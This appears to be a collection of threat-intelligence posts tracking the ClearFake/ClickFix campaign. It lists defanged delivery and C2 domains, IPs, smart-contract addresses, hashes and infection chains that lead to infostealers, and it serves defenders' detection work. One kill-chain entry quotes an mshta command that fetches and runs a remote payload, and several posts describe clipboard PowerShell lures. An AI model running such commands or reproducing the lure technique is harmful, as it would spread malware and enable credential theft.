🚨 ClearFake Payload Delivery Domain Identified

A domain linked to ClearFake activity has been flagged delivering a js.clearfake payload with 100% confidence.

Quick Facts:

▪️Type: Domain
▪️Indicator: x5ust[.]windshift[.]ru
▪️Threat Type: Payload Delivery
▪️Malware: js.clearfake
▪️Date: 05 Dec 2025 // 00:17 UTC
▪️Tags: #ClearFake
▪️Reporter: threatcat_ch

URLScan:

▪️Verdict: 0
▪️Title: FASTPANEL
▪️Domain: https://urlscan.io/domain/x5ust.windshift.ru
▪️Result: https://urlscan.io/result/019aebe2-3c71-77ff-9e6d-5d225679e78a/
▪️Screenshot: https://urlscan.io/screenshots/019aebe2-3c71-77ff-9e6d-5d225679e78a.png

DNS / CT Data:

▪️A Records: 104.21.19.50, 172.67.185.61
▪️DNSlytics: https://dnslytics.com/domain/x5ust.windshift.ru

Related Intelligence:

▪️CRT: https://crt.sh/?q=x5ust.windshift.ru
▪️VirusTotal: https://www.virustotal.com/gui/domain/x5ust.windshift.ru

Here is our in-depth analysis of the latest #ClearFake variant using the Binance Smart Chain and two new ClickFix lures.

ClearFake is injected into thousands of compromised sites to distribute the #Emmental Loader, #Lumma, #Rhadamanthys, and #Vidar.

CTI tip: monitor transactions from the Ethereum address 0x53fd54f55C93f9BCCA471cD0CcbaBC3Acbd3E4AA to identify new PowerShell commands distributed by ClearFake - and block/detect any traffic to malicious domains!

As usual, feedback is greatly appreciated!

https://infosec.exchange/@sekoia_io/114189330631698208

TDR analysts published an analysis of the new #ClearFake variant that relies on compromised websites injected with the malicious JavaScript framework, the #EtherHiding technique, and the #ClickFix social engineering tactic.

https://blog.sekoia.io/clearfakes-new-widespread-variant-increased-web3-exploitation-for-malware-delivery/

#ClearFake variant is now spreading #Rhadamanthys Stealer via #Emmenhtal Loader.

cc @sekoia_io

1. ClearFake framework is injected on compromised WordPress and relies on EtherHiding

2. The #ClickFix lure uses a fake Cloudflare Turnstile with unusual web traffic

3. Malicious PowerShell command is copied into the user's clipboard data to be executed in the Run dialog box

4. Downloading Emmenhtal from:

bytes.microstorage.]shop (1st stage)
w66.discoverconicalcrouton.]shop (2nd stage)

5. Further downloading and executing Rhadamanthys from:

bytes.microstorage.]shop/code.bin (https://virustotal.com/gui/file/a88c153e1595f9d193b3f881ec77e0d7d338ae22c9f6e67ffdf39c3609fcdbf7)

6. Communicating with C2 at:

91.240.118.]2:9769

Public analysis of the recent ClearFake variant: https://security.szustak.pl/etherhide/etherhide.html

Whenever you run something inside a Windows Run dialog box, apparently it gets saved to the registry under the RunMRU key.
This can be helpful for those of you hunting for ClickFix / ClearFake campaign activity since anything executed after the run dialog has a better chance of blending into benign activity.
Building regex patterns on the registry key values can help uncover any malicious commands with multiple arguments.

#clickfix #clearfake #threathunting
https://forensafe.com/blogs/runmrukey.html

While investigating an infected website, we noticed call to BSC testnet contract 0x0967296defa0fd586c9ede5730380e2b059fab95 : https://testnet.bscscan.com/address/0x0967296defa0fd586c9ede5730380e2b059fab95

The contract’s content is clearly malicious and connects over WebSocket to suckerity[.]xyz (behind Cloudflare), not related to #ClearFake, but reminds us #Magecart related injections:

#etherhiding (hiding malicious code in blockchain based smart contracts) is not only by #ClearFake related actors – but now also for #Magecart 👇

2025-02-05 (Wednesday): #ClearFake / #ClickFix style fake CAPTCHA leads to possible #Vidar.

Vidar C2 using eteherealpath[.]top behind Cloudflare.

Details at https://github.com/malware-traffic/indicators/blob/main/2025-02-05-ClearFake-or-ClickFix-fake-CAPTCHA-for-possible-Vidar.txt

Вредоносный код навсегда сохранили в блокчейне

Один из старых хакерских трюков — распространять вредоносное ПО под видом обновления браузера . На взломанном сайте размещается плашка с утверждением, что для просмотра нужно обновить браузер. И кнопка для скачивания обновления, как на скриншоте с прошлогодней атаки ClearFake . Таким образом, жертва самостоятельно устанавливает вредоносное ПО на свой компьютер. В прошлом году злоумышленники разработали умный способ защитить вредоносный софт от уничтожения. Они разместили его в децентрализованном анонимном блокчейне . То есть интегрировали код в смарт-контракт, который навечно сохранился в открытом доступе.

https://habr.com/ru/companies/globalsign/articles/878822/

#блокчейн #обновление_браузера #BSC #Binance_Smart_Chain #Binance #BNB #WordPress #ClearFake #BscScan #EtherHiding

Campaign employs the Etherhide technique, where payloads are delivered from smart Web3 contracts and Cloudflare-hosted sites spreading Vidar malware across infected ~5k wordpress websites. The campaign has been active for ~3 months as of 2024-11-24. #Binance #EtherHide #ClearFake #ClickFix #Malware #IOC #przepisyjoli ;)

https://security.szustak.pl/etherhide/etherhide.html?mst

#Clearfake killchain today:

victim site
-->
data-seed-prebsc-1-s1.bnbchain[.]org (0x80d31D935f0EC978253A26D48B5593599B9542C7)
-->
clickfix popup
-->
mshta hxxps[:]//solve.lzmb[.]org/awjsx.captcha?u={usr_id} # ✅ ''I am not a robot - reCAPTCHA Verification ID: 9973''
-->
hxxps[:]//u1.jumpcelibateencounter[.]shop/sh_RTXY4.mp4
(2b4ea59a346f5762e0e5731e0e736b08607e652424f49398ca4dfe593187565c)

Ultimately delivers Lumma

#ClearFake / #ClickFix is back infecting directly legit but vulnerable websites, delivering in the end #Lumma / #LummaStealer

#ClearFake variant (without using the EtherHiding technique) is spreading the #Lumma via the #ClickFix tactic on compromised websites.

- Sends fingerprint data to 176.59.196.]133/ip.php
- Copies PowerShell script to clipboard
- Downloads ZIP from GitHub
- Executes Lumma

Example of website compromised by ClearFake on urlscan:
https://urlscan.io/result/fa9231e0-8499-46ac-a616-1c5509cba545/

PowerShell script copied to clipboard:
https://gist.github.com/qbourgue/61064f3c1acdcad88a04f3d1eef9db9a

Malicious ZIP payload (Lumma):
https://tria.ge/241029-1dp31s1phk/behavioral2

Lumma C2:
requireow.]biz
snailyeductyi.]sbs
ferrycheatyk.]sbs
deepymouthi.]sbs
wrigglesight.]sbs
captaitwik.]sbs
sidercotay.]sbs
heroicmint.]sbs
monstourtu.]sbs

Payload hosting URL (404):
hxxps://github.]com/Vlad-A41323/PowerSheell/raw/refs/heads/main/Seven_NSKJY_x91.2.zip

@rmceoin @threatcat_ch @cyberamateur

New Swiss centered malware campaign in German using some #ClearFake / #ClickFix tricks impersonating Ricardo, one of the biggest Swiss online second-hand marketplace:

Finally we also witnessed in the wild one of those #ClearFake / #ClickFix bait delivered per email as reported by Proofpoint in June - ending with a #brutel / #Latrodectus / #BruteRatel
payload https://www.proofpoint.com/au/blog/threat-insight/clipboard-compromise-powershell-self-pwn

@monitorsg #ClearFake is back to fake browser updates. The EXE leads to a Lumma stealer that appears to use these domains.

predatowpmn[.]shop
preachstrwnwjw[.]shop
pang-scrooge-carnage[.]shop

h/t @GustyDusty

Detected #ClearFake infection chain

Compromised site
-->
bsc-dataseed3.defibit[.]io (Binance 0xC4D41e800A4C05ce291f6AE4baF49b002a081290)
-->
quickresource[.]xyz/VWBhLwJg/
-->
dl.dropboxusercontent[.]com (download)

d5558bb4f7db0aab0c709068a9561cd79eafaf035038d42f321620c94883762a Installer.exe

New #Clearfake domain
bsc-dataseed3[.]defibit[.]io
-->
bigdownload[.]xyz/VWBhLwJg

Detected #Clearfake infection chain

Victim site
—>
bsc-dataseed3[.]defibit[.]io (0xC4D41e800A4C05ce291f6AE4baF49b002a081290)
—>
majordatabases[.]lat

Possibly a new tld? The previous address was ichiupdate[.]lat

After mucking around a bit finally got a working Dropbox URL and file for the #Clearfake distributed #AtomicStealer fake Chrome sample https://urlscan.io/result/376addbb-7bcf-4d6c-9672-f6e96a271176/ https://tria.ge/240806-sahwjasark/behavioral1 and now it's a different IP 45.134.26[.]7 for the c2